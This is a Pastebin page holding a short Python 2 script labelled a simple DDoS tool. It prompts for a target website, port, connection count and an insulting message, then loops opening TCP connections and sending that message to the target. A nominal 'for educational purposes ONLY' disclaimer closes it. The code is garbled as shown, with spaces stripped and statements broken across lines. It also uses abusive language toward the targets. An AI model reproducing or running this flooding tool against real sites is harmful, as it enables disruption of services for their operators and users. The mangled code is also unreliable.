Advertisement
ukesh

Untitled

Feb 23rd, 2015
323
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.17 KB | None | 0 0
  1. #!/usr/bin/python
  2. #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3. #Rxdial'ssimple
  4. pythonDDoSScript
  5. #Infinit3
  6. #UsingPython
  7. 2.7.5
  8. #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  9. importsocket
  10. importtime
  11. address=
  12. (raw_input("Please
  13. enterthewebsite
  14. youwishtoDDoS
  15. ~~~~> "))
  16. port=int(input
  17. ("Pleaseenterthe
  18. port~~~~> "))
  19. ip=
  20. socket.gethostbyname
  21. (address)
  22. conns=int(input
  23. ("Entertheamount
  24. ofconnectionsyou
  25. wishtomake
  26. ~~~~> "))
  27. junk=(raw_input
  28. ("Enterthemessage
  29. youwantthese
  30. whorestosee
  31. ~~~~> "))
  32. print"Allright.We
  33. areinitializing
  34. theboxesofcrap
  35. youwishtomake
  36. themdrownin."
  37. print
  38. "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
  39. time.sleep(5)
  40. defdos():
  41. """This
  42. functionistheone
  43. thatsendsallthe
  44. craptheirway"""
  45. ddos=
  46. socket.socket
  47. (socket.AF_INET,
  48. socket.SOCK_STREAM)
  49. try:
  50. ddos.connect
  51. ((address,80))
  52. except
  53. socket.error,msg:
  54. print
  55. "Failuretoconnect
  56. tohost."
  57. ddos.send(junk)
  58. ddos.sendto
  59. (junk,(ip,port))
  60. ddos.send(junk)
  61. ddos.close()
  62. foriinrange(1,
  63. conns):
  64. dos()
  65. print"Wehave
  66. completedourtask,
  67. sir."
  68. #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  69. #Foreducational
  70. purposesONLY
  71. #Givecreditto
  72. creator:Rxdial
  73. #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement